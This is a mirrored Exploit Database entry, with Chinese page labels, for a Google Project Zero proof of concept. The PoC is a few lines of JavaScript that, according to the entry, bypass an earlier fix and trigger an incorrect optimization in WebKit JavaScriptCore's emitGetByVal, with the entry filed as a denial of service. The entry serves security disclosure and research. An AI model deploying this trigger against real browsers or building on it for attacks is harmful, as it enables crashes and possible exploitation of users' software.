WebKit JSC – ‘BytecodeGenerator::emitGetByVal’ Incorrect Optimization (2)

• Exploit Database
• 37 阅读

• 作者： Google Security Research
  日期： 2017-10-04
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/42955/

• <!--
  Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319
  
  The following PoC bypasses the fix for theissue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263)
  
  PoC:
  -->
  
  function f() {
  let o = {};
  for (let i in {xx: 0}) {
  for (i of [0]) {
  
  }
  
  print(o[i]);
  }
  }
  
  f();